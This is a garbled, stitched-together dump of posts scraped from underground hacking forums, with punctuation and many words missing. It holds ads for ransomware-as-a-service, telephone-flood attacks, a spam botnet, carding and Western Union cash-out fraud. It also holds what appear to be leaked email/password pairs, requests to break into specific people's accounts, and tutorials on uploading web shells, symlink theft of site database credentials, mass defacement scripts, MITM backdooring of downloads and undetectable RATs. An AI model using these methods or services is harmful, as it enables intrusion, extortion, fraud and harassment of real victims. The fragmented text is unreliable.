can also teach you how the following with our ebook and online tutorials hack and use credit card shop online monitor any phone and email address hack android iphones tap into anybody call and monitor their conversation email and text message interception for more information contact moore hdmoore. 
great def could use this with some cracking programs. 
hope you all enjoyed. 
yeah not the best but definitely gets the job done. 
what language you want and what are exactly trying accomplish can sell you bitcoin raiding malware with keylogger for educational purposes only but ill have configure the for you. 
austria blacklist yes checked. 
beau vallon unknow seychelles blacklist yes checked. 
hmm it's okay think know you wern't you. 
wow will try out thanks bro. 
some basics tutorials metasploit spirit hello guys name spirited wolf and today here share some nooby tutorial's metasploit first thing what metasploit answer will metaspoit framework open source penetration tool used for developing and executing exploit code against remote target machine metasploit frame work has the world largest database public tested exploits. 
simple words metasploit can used test the vulnerability computer systems order protect them and the other hand can also used break into remote systems. 
its powerful tool used for penetration testing. 
learning work with metasploit needs lot efforts and time. 
ofcourse can learn metasploit overnight needs lots practice and patience. 
here you the cheerz. 
part hacking into windows using setoolkit measploit tutorial spirit part create key logger sniff data with metasploit tutorial spirit part disable your victim's windows firewall using metasploit tutorial spirit part how exploit any windows linux firefox xpi bootstrapped add exploit tutorial spirit part command injection tutorial spirit you like these tutorial then please subscribe channel and also share please but any ways just for the newbies not for professional's please comment done anything wrong. 
share your knowledge with those who really need. 
spirited wolf this tutorial for educational purpose only. 
i'll not responsible for any harm. 
use your skills protect other not harm kiki emoticon thanks for watching guys and keep watching pentesting with spirit our youtube channel link. 
com facebook page link. 
spirit twitter account spirit. 
know nothing about hacking but need hack into someone's account dating website. 
only after their email address. 
have idea where start. 
all know her username. 
possible hack her account can email her thank you. 
this shit survey imma ban. 
wanna check this out. 
mcmanuel wrote coindaylol wrote found this thread another hidden network onion net. 
you can confirm that the injection works doing the following converter url click hex the top and check further down. 
but you can also take that address and input into the search box the upper right url and see that this recipent your bytes indeed addressed exactly you specified it's called the hash and just trust that it'll stored exactly the physical disk well. 
now how know what bytes send make long story short i've converted all virus signatures that could find from open project url into byte long strings and later into bitcoin addresses all signatures equal longer than strings has been used. 
put all those viruses into one file causes virus total nuts url imagine having that forever the bitcoin database files. 
the addresses are available here url there's point altering those for your own winning sake. 
can you teach more about. 
you can invade you know their mail you can the forum download some tools crack their own. 
this cool thanks for the link but before use need know. 
does this work gmail and can detected the account holder like does alter their password need access their machine. 
sorry for all the questions and forgive out line new this and like careful dont want get caught out cool this might just what need have you with questions hope thats. 
anonymous proxy blacklist yes checked. 
does this work all. 
all recently i've been participating local hacking challenge something similar the famous picoctf and although i've managed solve most the challenges there are few that still evade. 
was hoping you guys would able help with this particular one objective get the flag from the following website. 
what has done basically find flag the format flag some words from that website. 
course i'm not asking you find the flag and tell after all it's 'challenge' but i've poured over this one for days avail. 
would great one you could put the right path give some hints and the like. 
some observations i've made the most stand out thing here that you can upload image 'registering' just enter anything the mail field there verification. 
and logging the only thing you can view the image you've uploaded. 
have tried most tutorials uploading shell disguised image file but all tries have failed far. 
also clicking login without entering anything the username password field takes you account with 'inkblot. 
advanced thanks for any help. 
type your reply this message here. 
lets see its working just like all. 
please how can make modem static. 
mean want set remote administrator server and require static notify whenever victim target online please how cani set windows static. 
nice work you guys are doing. 
hello need view this. 
thanks this very good share. 
what i'm just after email address. 
i'm not going anything malicious. 
hope still working lol. 
london city united kingdom blacklist yes checked. 
thailand blacklist yes checked. 
unknow unknow iran islamic republic blacklist yes checked. 
south australia australia blacklist yes checked. 
how does work thanks for distribution. 
luckmangamer wrote this pack contains latest windows and office activators. 
these activators are very popular and full version. 
these activators can used activate windows microsoft office. 
includes following activators microsoft windows offline activator windows premium activator. 
final windows permanent activator. 
final windows all editions premium activator. 
final windows permanent activator removewat. 
final windows permanent activator loader extreme edition. 
final windows loader permanent activator. 
will test thanks advanced. 
stop posting garbo clearly says cc's site gonna post shit make useful. 
giving this one shot. 
thanks for this post. 
network anonymous proxy blacklist yes checked. 
net denmark blacklist checked. 
unknow unknow russian federation blacklist checked. 
hope will work for thanks bro. 
feel happy with thanks. 
hello guys there hack write email adress and the password displayed. 
thanks for this looking. 
probably this shitty survey. 
want buy keylogger and silent exploit. 
thanks for sharing mat. 
hamilton unknow bermuda blacklist checked. 
your winning will paid automatically after each game finish. 
place your bet and win your bet right. 
gonna test thank you for share. 
yet get what want. 
nice sharing like that. 
lets see how works. 
thanks bro nice stuff keep bro. 
let see the modified zeus. 
nice sharing man really cool. 
seems cool thanks for sharing. 
main features automatic grabber grab from any site range generator random generator nonstop option grab from file extremely fast and accurate ways getting the fully customizable auto page changer limit for memory management totally multithreaded automatic webdav dir finder gets the grabbed and checks webdav dir exists split the into working and non working timeout option totally multithreaded vulnerable scanner checks with webdav dir vulnerable username and pass can modified shell uploader upload user defined php file customizable letter for temporary connection extra features secure hwid login system automatic update system export file option remote desktop checker autopilot parallelism code structure size click here for download size size click here for download size scan report code. 
com file dfb analysis. 
thanks for the 'tutorial' hopefully helps. 
can you post again the link has been deleted. 
the link does not work can you reload. 
thanks for the share admin looks helpful. 
need this because have the rat already. 
net mexico blacklist yes checked. 
let's check this out. 
hello everybody have new script for free for all user there have many options eval mysql dump php info net sploit upload mail port scanner jumping tools python symlink config bypass cgi shell cgi telnet domain mass deface zone joomla indchange indchange respass joomla respass whmcs decoder ddos hash hash wordpress bruteforce joomla bruteforce cpanel bruteforce bypass cloudflare admin finder whois mass pass script encode joomla server scan bomb email tutorial ebook about log out. 
bombomhello man need tools like inbox php mailer wrote payment instantly perfectmoney bitcoin wmtransfer btc please click buy socks update tools client dichvusocks. 
net france blacklist yes checked. 
oklahoma united states blacklist checked. 
this seems legit lemme check out gang. 
bulgaria blacklist yes checked. 
the name god the merciful this tool let you upload automatique index the following paths tmp images main page change the following the code here you index code sahrawi. 
php the output will like this. 
php' piro letaksekarang piro str replace you explode piro aze count you aze aze chdir. 
fileedit sah tmp aze aze aze for counter counter aze counter chdir. 
fileedit sah tmp echo tmp echo jeneng vers echo jeneng exit echo. 
bagues' function letaksekarang pageurl server pageurl. 
server server port pageurl. 
server request uri else pageurl. 
server request uri pageurl left pageurl strlen pageurl strpos strrev pageurl pageurl str replace. 
basename file pageurl return pageurl function left string chars vright substr strrev string strlen string chars chars return strrev vright function vers eval strrev emanu php ohce echo. 
letaksekarang function fileedit sah tmp writable getcwd fil fopen sah 'w' fwrite fil tmp fclose fil else fil fopen 'configuration. 
php' 'w' fwrite fil tmp. 
fclose fil fil fopen 'index. 
htm' 'w' fwrite fil tmp. 
html' 'w' fwrite fil tmp. 
fclose fil fil fopen. 
sah 'w' fwrite fil tmp fclose fil fil fopen. 
sah 'w' fwrite fil tmp fclose fil. 
dogpen wrote have searched high and low for real free vpn service stay anonymous online. 
always found sites that say its free but have change password and certificates every many days. 
finally found one that literately one click button vpn. 
will never anywhere else for vpn needs. 
this must for anyone that wants hidden online. 
there spyware malware attached. 
when finished click connect and voila you are now surfing like pro. 
give the shell bro good. 
thanks for this good tutorial hope helps. 
aba give this try. 
hey may know how goes. 
thanks for the nice rat. 
some good stuff board. 
may see please thank you. 
nevada united states blacklist checked. 
welcome the participants the platform offer you the service telephone flood from floodclub. 
work with black lists voice menu and multi line phones. 
free five minute test drive your phone. 
mobile and fixed numbers cis stream for. 
each next stream bonuses for orders with more than. 
stream with retention compliance with the ivr terms playing record agreement. 
mobile and fixed numbers stream for. 
each next stream stream with retention compliance with the ivr terms playing record nice bonuses for long term orders. 
mobile and fixed numbers usa stream for. 
each next stream stream with retention compliance with the ivr terms playing record other numbers arrangement the presence routes for particular regions. 
please read the answers frequently asked questions faq what the stream what their quantity does affect and how choose the required number the number streams quantity lines canals using for the simultaneous dial subscriber. 
using one line new call subscriber could initiated only after the end the previous call. 
using two more lines simultaneous number calls could initiated which equal the number lines. 
will reduce the gap between calls and make the attacked subscriber incoming line unavailable for calls. 
the quantity used lines depends customer aims for annoying calls using one line enough. 
the aim make subscriber unavailable for all calls need select the number treams meet exceed the number subscriber incoming lines. 
the majority mobile numbers have two incoming lines achieve effect busy recommend use two more streams. 
what does auto login line voice mail flood with retention mean auto login line voice mail mean any action the side attacked subscriber which leads the beginning tariffing after the connection. 
that case simple flood with retention after the rising handset will not lead expected result such cases use flood with retention the line with the implementation necessary actions for example pressing the key. 
there the gap between calls while using one stream after the end the previous connection time setting new connection depends such factors type the subscriber mobile fixed load the operator network the subscriber the current time the routes using the operator for the current call etc. 
according our observations the average interval between call can vary from seconds. 
the gap reduces one third with each additional stream. 
you have all calls from one number different numbers have opportunity set number display while the incoming call and believe that not our interests specify one instance default for orders russia use the followimg numbers show where random digit default for orders ukraine use the following masks default for orders belarus use the following masks the customer request there will set any masks that conform. 
installation specific numbers possible they will displayed among the rest. 
subscriber has the redirect according the signal busy what this case recommend increase the amount stream for this number. 
while setting the redirect according the signal busy calls will redirected subscriber mentioned number including flood calls when using two more streams but the effectiveness flood will slightly decreased because subscriber has new additional streams. 
normal mode the attacked subscriber couldn use the phone but the incoming call can accepted with luck and subscriber persistence. 
work trough the guarantor ready tested. 
order and support service are available the following contacts mail buy. 
club fast answer jabber exploit. 
club beware scams double check the spelling icq the service reserves the right refuse perform the task without explanation. 
contributed funds will returned excepting noted cases. 
attention don work with cardholders and emergency numbers emergency response services. 
the slightest suspicion forbidden subject order execution will stopped refund won made. 
registration code code personal code key utsr vstq code. 
unknow estonia blacklist checked. 
i'll let you know email. 
thats fucking lmfao fam. 
would love spam this ransom fair deal. 
thanks bro for this share. 
thanx for the post dude remember and also good for some some time try all time the message islam. 
thanx for the guide due. 
tennessee united states blacklist yes checked. 
primor 'ye russian federation blacklist checked. 
vermont united states blacklist checked. 
sao paulo brazil blacklist yes checked. 
thanks much lmfao this good. 
have obtained the snapchat and username and need able log and monitor without logging out the used device there anyway this windows computer. 
could please have the password whatever need thanks for the password dude very quick. 
colorado united states blacklist yes checked. 
kuala lumpur malaysia blacklist checked. 
argentina blacklist yes checked. 
bhai tumhara bhi padh. 
hello bits hack have for you private program that can crack any hash without wordlist your cpu must powerful that's all it's coded russian friend download link. 
check again are stil work not. 
netflix accounts for account warranty for account month warranty you want buy more than that just tell how many i'll give you deal. 
warranty the account not paid for anymore then you will giving another one. 
the password changed this not covered under the warranty. 
suggestions don't change password the account this will cause the owner not pay for any longer. 
clear viewing history after done watching. 
free copies available after you get the free account you have vouch worked not. 
can have the auth code please. 
rar password vipunderground download url thx dud. 
all the hackers here are theives and ripper especially code. 
fire the admin not pay for any service the hackers this site. 
just sharing latest hack. 
was tired hacking where needed login. 
hacking authorization page just much hassle specially when you come across hash which pretty much seems would take ages cipher. 
many you don't know this but like the old traditional manual hacking makes think creatively and opens many doors for opportunity. 
con for hacking manually without any tools that takes days sometimes through hundreds directories and files get what need. 
don't get wrong use tools from time time when the manual option has been exhausted. 
this link click here will display all the videos and pictures without logging. 
now this may not seem much until you start messing with the url instead jan. 
remove everything after jan since jan main directory and adding anything after that would might not work since each directory has different sub directory. 
for your convenience tested all these folder you won't have try and figure out which one works you can see some the are only letters and some the are full words. 
you can feb march april may june july september once you are the directory you can just simply browse the sub folder and look for. 
simply click the file. 
haven't tested this mac yet but all the videos and images have been tested windows and are working. 
once the video downloaded just locate the video and play that's. 
thanks for this guide very usefull top wallet. 
just wanted know there way save the pdf the website. 
these are medical notes that cannot downloaded but can only browsed once you register. 
com notes any help will great. 
i'm going help you really quick don't ask for another hacker when that's what got you screwed the first place besides what would stop from saying will help you and screw you over again and it's paypal not the irs tell them suck dick until you get the money just don't pick the phone your credit may get hurt bit its lest than. 
dollars it's not completely wrecked. 
plus already all saw your earlier this week post multiple ones will definitely not help. 
sucks you were bullied but that doesn't give you moral superiority even did how know you aren't just lying. 
goodbye will not respond this sent from using tapatalk. 
tried contact you via jabber you have skype. 
utah united states blacklist yes checked. 
net australia blacklist checked. 
north carolina united states blacklist yes checked. 
new jersey united states blacklist checked. 
blink blink cracking basic crackme with programmer blink blink welcome tut this tut mainly for newbies this tut will show you how find serial for basic crack and patch making accept any serial. 
hope that you will learn something from this tut greetz blue lordcoder cybotx phoenix and other team members team uret and reis. 
thankx for this brother its awesome tool. 
the last few years hackforums. 
net has increase there security. 
started blocking countries but now they are blocking vpns proxies tor shared ips and general ips that tries infringe there terms service. 
other words omni blocking every one that tries outsmart the system. 
are you been blocked with message forbidden error access denied your answer yes then you will have hard time trying break there blocking system. 
i'm introducing hackforums proxies. 
hackforums proxies can unblock and access hackforums. 
net using private servers. 
this are working servers that will bypass there security and give you access the site. 
the first public release version was been used lot people exactly users and got banned was force add restriction this application. 
after opening the aplication password will prompt for each server and you have two options get. 
buy all the passwords paypal for ask for test trial this only gives you read access hackforums. 
net and you will not able post any information download. 
com file aeffc dfe analysis code. 
how replace existing password pass swatch auth pass ead replace passwords with passwords. 
ukraine blacklist yes checked. 
orxteama wrote after year being very successful witah our private locker software are now releasing the public. 
have worked hard provide better option any the other freeg locker services implementing proper crypto and not including any the major decryption flaws that some the other services have. 
here are some the features our service has offer rsa aes cryption that has been properly implemented private key stored server and only released after payment locks all fixed removable network drives very fast scan and encrypt functions small. 
exe with required control panel with instant stats and detailed info frequent updates software for evasion and new methods customer support for our users and their paying customers referral system allows you make extra cash off other peoples locks even you have none you set the lock fee whatever amount you like and only keep for the services with discounted rates available users with stable supply paid unlocks instant cashout bitcoin give our service try are sure you won't disappointed. 
orx locker available over tor. 
this tutorial shows you how upload your shell. 
color requirements color firefox browser http live header firefox addon click here shell. 
asp will provide good private shell the end the tutorial tools will provide the end the tutorial. 
steps find website where you can upload images you may need register websites used this dork google inurl upload image. 
php you don't know whats dork. 
just copy and paste google got this website. 
php now are going browse for 'up. 
jpg' then open live http header from tools live http header then click 'upload' now live http tool and search for 'filename. 
jpg' and click then press the 'replay' button. 
phtml' just like what did here now uploaded the image. 
time for soma nasty stuff. 
where the image was uploaded. 
php shell 'its private shell cant access. 
phtml you will find page like this. 
php whatever you want and upload. 
the shell location mine was. 
enjoy hacking websites hacked with this vuln click here note please don't remove the upload image. 
php from site make any damage make this tutorial more understandable for others yet find another dork exploit. 
com search the best way find some good dorks. 
was gonna forget tools. 
com photo yjqs hsu online. 
php private shell post down that you want and will send you dont and will give you link sorry take some time that send you shell but. 
can send right away get some thanks regards for people who ask for. 
txt and paste this. 
code margin top margin bottom line height upload. 
basename files 'userfile' 'name' isset files 'userfile' 'name' move uploaded file files 'userfile' 'tmp name' uploadfile echo the file. 
basename files 'userfile' 'name'. 
has been uploaded else echo there was error uploading the file. 
please try again then rename. 
blazelord wrote very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like enjoy just wanna see. 
jimboss wrote need someone work with that can setup well crypted rat that will almost invisible any anti virus. 
skphero wrote thanx for the guide make money with sharecash mega seven methods plus the antiban guide completely free. 
thanx for the guide. 
thanks for sharing this with. 
love the poster nive job. 
stoke trent cpc stok cust. 
com hong kong blacklist checked. 
saint petersburg city vpnpool. 
russian federation blacklist yes checked. 
bern switzerland blacklist yes checked. 
illinois mndn pdyn adsl. 
may check out your tool please. 
offer botnet and massmailing service make your own biz with. 
meanwhile there are many cheap locker available. 
earn money with ddos. 
may bots sends million emails per day plain text html text less with your att. 
you can use random email addresses our botnet. 
give your mysql database csv file with your mailing addresses plus your text and attachmnt. 
give you access our vps and panel. 
very simple use and can assist you. 
can install your database. 
selection regions central europe northern europe usa canada japan china taiwan korea southeast asia astralia new zeeland gus countries off. 
your special wishes are welcome. 
payment bitcoin only basic price per day for using our botnet and your email text attachment your database csv file attachment per day vps our server panel etc according your wishes. 
minimum order btc work for you that you can earn good money. 
krugerhacker wrote release man youtube. 
com wty thats cool but check this out have kit that better than enlightenment and uses fallback old kernels comes with perl script download the tar. 
file and exploit and also the sql file and the secure post file for the gate keep track roots. 
welcome mobile prank hacktool world after. 
new and fresh update been released. 
has major update with lot diferent services make pranks using browser. 
mobile prank hacktool browser mobile prank tool were anyone can make calls send smss any number the world. 
com pzcx irus scan. 
nicomayn wrote troxy wrote there methode bruteforce attack you try thousand passwords and one them should match but this take too long i'm willing try anything get account back. 
there guide how this and how long does usually take thanks. 
new york ool bfe. 
reply see the post. 
would recommend making fake google account use with the hacking tools cuz better safe than sorry. 
thanks guy let see how works. 
what method did you use get those. 
works yahoo gmail hotmail download here hidden content you must reply see links virus scan report hidden content you must reply see links. 
welcome the participants the platform offer the service telephone flood also known attack phone calls from flood club. 
prices mobile and fixed numbers cis stream for. 
you have all calls from one number different numbers have opportunity set number display while the incoming call and believe that not our interests specify one instance default for orders russia use the followimg numbers show where random digit default for orders ukraine use the following masks default for orders belarus use the following masks have masks for all countrys the customer request there will set any masks that conform. 
got better program that does that and lot more. 
you only need write the sms simply send the prank calls. 
sorry but your program crap virustotal virus detection i'm not using. 
can't find tutorial bro. 
vbdhb eehgege egeg ege. 
send emails from any address without logging features private anonymous server bypass spam filters spoof any identity goes into spambox spoiler download now virus scan you're having problems please post here for the pass. 
need software that can intercept text messages. 
carding website hotels very easy carding site that's how use the site and the link. 
qkgks step make your reservation your choice destination the period stay then click search you find list hotels and the price your booking step then validate your choice enter your details enter payment information credit card confirm your booking you can check your booking phone. 
okey let try this iut. 
maybe some them will still work. 
abew please share the trick. 
tahnk you much bro. 
will try that hope works. 
thank you for nice post. 
thank you for post will try soon. 
new york ool bca. 
iceland blacklist yes checked. 
michoacan ocampo customer zra. 
nice job how yahoo hacks. 
this may not work but hay wanna steam somones account. 
thank you very much for this tool. 
saint petersburg city lan. 
ontario cpe cmbc dfbdb. 
new south wales australia blacklist yes checked. 
would love try this out. 
fmahvxmyut this quick demo about how backdoor executables software sent over http using mitmf backdoor factory this attack works lan requirements kali linux any linux wireless usb adapter. 
mitmf man the middle framework. 
com byt mitmf msfconsole armitage lan network same the target victim attack scenario machine victim machine attacker situation where machine wants download software for example winrar the victim goes through google and lands the page. 
html the attacker already waiting inject payload into binaries served over this attack possible because lot tool websites still serve binaries via non ssl tls means. 
orxteam wrote rsa aes encryption that has been properly implemented private key stored server and only released after payment orxteam how with performance. 
sao paulo unknow bacc cdb. 
michigan united states blacklist yes checked. 
suceava romania blacklist yes checked. 
hello everyone telling you the legit website that paying for everyone who sign this site. 
post about different forums. 
redeem your free coupon. 
com and sell your coupon. 
receive your easy paypal skrill this legit and paying website. 
also trying out and soon get the payment will post here. 
yeah too want know. 
nice don't like this have write some shit see link. 
hoping the service rugged. 
klthingz wrote sounds nice idea. 
plz post how bypass the http authentication login. 
some experience with attack mode note all attacks from small large threads tested much possible order achieve the effect the minimum thread. 
website testing enter the domain name please enter web not need add. 
mode web thread effect excellent for all dynamic and static sites game port not add this pattern otherwise attack effect. 
mode web thread effect excellent for all with the golden shield and other soft anti site. 
mode web thread effect excellent for all dynamic and static website the flood model test proposal. 
mode syn thread effect good this mode recommended for test port. 
pattern udp thread effect excellent this pattern for universal. 
mode icmp thread effect excellent this pattern ban ping invalid. 
mode drdos thread effect excellent this pattern for universal more than. 
model the tcp connection thread effect better port this pattern suggested for testing note before closing the main stop line poll and assists the tick removed software download. 
rar rar passwords bitshacking. 
forum appear rarely please write contancts contacts first post. 
executioners wrote see this still works pls. 
wrote hello all urgent need remote keylogger. 
searched lot and getting error and posted images bellow. 
any one have please. 
mentioned not asking for sale and all its replacement and exchange coders exchange needed good working fud remote keylogger one parallels plesk panel space year unlimited host and unlimited sub domain imp fud. 
thanks much man for rhis share. 
wrote email password code hotmail xjavvoohx hotmail. 
com asd yahoo spermtank yahoo. 
com year mark paulman yahoo. 
com fireball jonald oneshot yahoo. 
com gwdbulldogs bxthedarkone yahoo. 
nice post bro thanks much. 
thank and let look. 
this still work i'm gonna try this. 
rafiqctg wrote friends enjoy dont change password url many thanks bro. 
sound very interesting and great work. 
will like work with you. 
phamngpochathu wrote vyrus wrote all mail password cracker. 
ergeg eergger gerg ergvvdfd dfvdfvfdvd dfd eregegeg egege. 
need the password apple. 
know the apple already just need someone get the pass. 
thnanks share apreciate this. 
realy nice post bro. 
cant download from sendspace. 
nickron wrote just sign here and confirm your account receive usd hope this work amionxp wrote nickron wrote just sign here and confirm your account receive usd hope this work not working again anymore. 
amionxp wrote hello again guys offensive comunity after shared the cryptersoucre now time for botnet source all this botnet still source and most them make using and here link download password for the rar thx for share. 
tamper data very important. 
free download portable version havij. 
bugfix utf and unicode encoding click here get download links. 
thinking out the box powering try out. 
thanks good good job. 
trying this now running fast let's test this works i'll post feedback. 
thanks bros hope not geting this late. 
com downloads screens ufr. 
microsoft visual studio thx. 
can use zelix klassmaster. 
these guys wil never serious. 
want buy access your phone number verified gmail account. 
just need access for month because there website which provides free virtual credits return gmail account. 
price bitcoin paypal negotiable requirement you should not change your gmail password any time within that month your account should not used any paid trial google services like cloud developers etc account must least month old process you prove its your account via screenshot hacked account won't work send user pass will pay you once login you will receive text your mobile due google filter give that code. 
send you are intrested. 
rehr eryry eyeryery ery yey eyery. 
color red built basic port scanner which could come useful. 
virus scans size click here for download size size click here for download size color. 
ethical password hacking and protecting video tutorial which helps you learn different password hacks and protecting methods. 
videos this course demonstrate hacking and protecting wifi and many other password protected accounts using keylogger guessing brute force phishing social engineering methods and counter measure for each them. 
com password hacking couponcode jan more hackindev. 
cant wait try out. 
think idm makers need fame not money. 
they simply want become famous. 
cool thats why they not anything for the security idm. 
will see later working. 
thanks for this previllage amionxp wrote hello again guys offensive comunity after shared the cryptersoucre now time for botnet source all this botnet still source and most them make using and here link download password for the rar thanks. 
yahoo gmail url want check this out. 
thanks man for sharing. 
encrypts selected files and asks for money what you want for data recovery. 
included source code and binaries encoder and its builder. 
features encrypting files using xor and tea configuring masks files search which are needed process pile all sorts different settings such the number attempts enter the password see the screenshot encoder was written masm but builder delphi the password for decryption not stored clear text the build but its hash there random offset from beginnings files for each build for encryption update packaging with upx when the default changing wallpaper desktop there feature drop into autorun dropping text files with info the text which entered the builder written into files everywhere all dropped and encoded files date change not changed rar pass pastorok download. 
havij sql web page. 
sql web sql havij injectiong havij havij gui oracle retry mssql waf mysql getting bugfix url bugfix mssql bugfix bugfix bugfix utf unicode. 
zer freak hash identifier. 
dez virus scan report clean. 
found this deepweb password scamleaker virusscan. 
thanks for share bro. 
zimbra wrote hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page want see register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see. 
looks same service like tox still i'll interested trying out. 
let's see how goes. 
great one bro thanks. 
awsome post man keep. 
student i've downloaded spoken english sotware from. 
htm please see this website and help how unlock this software. 
contatowork wrote luckmangamer wrote hello hackers and newbies don't forget hide your before doing anything. 
nice luckmangamer wrote hello hackers and newbies don't forget hide your before doing anything. 
guess need some programming skills here. 
great ideal hope work. 
htaccess the best option for bypass safemode. 
the company that provides internet people also site affiliated with that asked for directly their page maybe not sure what trying but asked hack company did game over what did want out this confused. 
making darkcomet rat fud working this post demonstrates how make darkcomet rat undetectable. 
bqtd please watch and subscribe. 
other post the link was broken i'll try here. 
symlink tutorial symlink method reference other files and folder linux order make linux work faster. 
symlink bypassing hacking technique used gain unauthorized access folders server. 
using this technique hackers are able hack multiple sites shared web hosting service. 
first all download the symlink shells needed from here. 
html now there you will get shells named dbman. 
php database manager and sym. 
php the main tool auto symlinker now you should have shelld site course now upload both shells any writeable directory next step open both shells open different tabs now goto sym. 
php and click user and domains it'll list you all sites dat server also after opening you'll get see symlink option now choose any site and symlink you select the domains and script option it'll list you all joomla vbulletin etc sites server find the config file site you symlinked and read you'll see sumthing like this mysql database username define 'db user' 'csseguid nauqri' mysql database password define 'db password' 'qwe mysql hostname define 'db host' 'localhost' now after reading config. 
php file got the sites database username and pass next will login using dat credentials into our database manager shell after logging just find the admin table and change pass your own hash have reset admins pass your own and login into the site admin panel database config files locations vbulletin includes config. 
php ipb conf global. 
php mybb inc config. 
php php nuke config. 
php php fusion config. 
php dist wordpress config. 
php drupal sites default settings. 
php oscommerce includes configure. 
php seditio datas config. 
really needed this files guys its worked very thankfull use its not working. 
udp icmp tcp fud there are things you dare backdoor issued. 
thank you very much good tutorial for. 
this really old bruteforcing but still great tool. 
it's called brutus aet. 
what brutus many people refer brutus remote line password cracker this fairly accurate and suppose just about sums brutus. 
there any other software like brutus there are more tools now than there were when brutus was originally released some tools note include offering pop ftp generally nice and easy use. 
entry offering pop ftp commercial and freeware versions. 
there are others too with whatever suits you sir. 
what bad file that's brutus application definition file these are small files that contain configuration information for brutus usually for particular authentication type device. 
brutus can import and export bad files you can install new authentication types applications into brutus you can create new custom authentication types and export them for others use. 
here's some made earlier. 
net brutus brutus appl. 
western union and bank transfers are now available the following countries worldwide all transfers are processed immediately payment has been confirmed. 
you can pick funds from any western union store your location. 
all transfers are done using own offshore servers and accounts you have nothing worry about. 
give you the mtcn sender info and all cash out info hours. 
the transaction done using either high limit full info cards bank logins depending amount make series transfers our exchangers who then turn send the money the receiver. 
this done increase the margin safety both for and the receiver. 
com icq info needed for transfers full name city country valid email for sending you mtcn info etc mtcn will ready for pick maximum minus after payment please dont ask for any test transfer prices for western union online transfer asia canada france germany italy and nigeria transfer charges payment btc transfer transfer transfer transfer transfer note only time transfer name week you need daily transfers then you must have use more names. 
transfer for first time buyers for build trust and loyal together here before move bigger amount hope hear from you soon info needed for bank transfers bank name bank address zip code account holder account number account type routing number bank transfer will take maximum hour show money your bank account. 
will only one transfer week one bank account. 
you need more transfers then arrange more bank accounts. 
price list for bank transfer transfer charges payment btc transfer charges transfer charges transfer transfer contact mail yahoo. 
com icq come and let get paid together and here with great best world stuffs stock now. 
free download internet download manager. 
build changed google chrome extension resolved problems with downloading videos from several sites fixed bug with high cpu loading click here get download links. 
mailer inbox free script clean. 
its real wroking software just like all another spam tool edit always fake. 
lets see gmail hotmail yahoo yandex successfully finds passwords for mail and many more. 
thank you for this. 
thank you for sharing your tool with. 
thank boss for appericate. 
recomend that you buy crypter instead and use any trojan available online. 
rar password vipunderground download url thanks. 
post the tut here every one will learn that why joined this forum learn and share ideas. 
link for download want pass ashiyane. 
com download mwsq admin list havij txt. 
com download vhxam ain compiler. 
com download amozesh dark gharibe ftr. 
com download hdhcqi pwqz amozeshe ghadam ghadame hack fdp. 
com download hmbnmavfmh ashiyane fakepage checker. 
com download fzvqyz bumblebee spreading guide fdp. 
com download hlbpt cmd fdp. 
com download iamncozun code convert. 
com download ekl jxmq csharp tutorial fdp. 
com download fkvkxwb dork admin page ftr. 
com download gump easy binder. 
com download xva email bomber. 
com download phn fake mail sender gharibe. 
com download xdi oxtg oujary icon changer. 
com download lel infested doxing guide fdp. 
com download pvdbd crmblb infested spreading guide. 
com download erh vtvt hil infested spreading guide fdp. 
com download ouc sse jzv tajzie tahlil system fdp. 
com download lion hacker runpe gen. 
com download zrhpbvo make keylogger ftr. 
com download eftb make your own crypter farsi fdp. 
com download vrpx lion downloader. 
com download gtxeant mrjoker stub generator. 
com download ggabugp nod serial txt. 
com download mvt awn nod serials txt. 
com download zad pdumm project spread fdp. 
com download ffewbf proxy finder. 
com download ferlvqy smob psiphon. 
com download gxbqx gkyd pumpspooficon. 
com download bnzwyw scz rat scan beta. 
com download admcazclfv smart assembly ftr. 
com download wvgbw gub spreading guide fdp. 
com download gsg spreading guide fdp. 
com download zrt hzn teamviewer setup. 
com download mydkj the ultimate spreading ebook. 
com download tyler durden's spreading methods book fdp. 
com download birdv views increaze. 
com download meyeu yahoo maker. 
com download cqadtp crlqqnm. 
net usefull source codes ftr. 
wow dude reply fast for. 
available deposit bitcoin and litecoin. 
would work for windows. 
hope its working one. 
umm definately virus ridden. 
may see your cool. 
hope this will work for canada sites. 
thank you for posting will check this. 
you use tor this extra layer protection. 
browser tor entry node tor middle node tor exit node glype proxy server. 
there's simple text document that needs removed but it's big school server. 
edu ans physics brau term papers matt. 
bourdj wrote you have look the link url want answers pls thanks. 
publish complete and very new thank you. 
rar password vipunderground download url much confidence will try. 
final portable cannot see the download link. 
net images smilies troll. 
this old exploit that still use exploit udp shells here the download link this exploit hack tool may detected from antivirus just disable then try run the exploit again enjoy. 
net qkm download the. 
zip file extract everything then run the exploitscanner and will use the list provided exploit the shells you can find more lists online here youtube video providing how this exploit works note around shells can take out home connection. 
com watch muejg your welcome. 
this pack contains latest windows and office activators. 
final portable click here get download links. 
let see how much easy this. 
start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp will take look. 
interesting i'm curious check. 
pskzeb virus scan report clean. 
great botnet will give try will work for. 
really mate working really mate working. 
house policy you can always talk codefire. 
its good stuff but have not tried yet. 
make money with sharecash mega seven methods plus the antiban guide completely free. 
rafiqctg wrote friends enjoy dont change password url. 
thanks for these accounts. 
just replying see the comment. 
thanks for the info. 
bourdj wrote you have look the link url want answers pls nice job bro. 
can someone teach how hack facebook gmail. 
rar password vipunderground download url thanks for sharing. 
blink link dead blink dance dance dance dance. 
very nice thanks alot bud. 
rafaelcario you site wrote using facebook accounts. 
txt password and start cracker download fix your site. 
thanks bro vey much. 
would like software please. 
dude think this site going scam. 
dont think work this. 
gif thanx for the autoclicker. 
want see this exploit. 
you can actually use python script hack but the chance the second way use phishing webpage. 
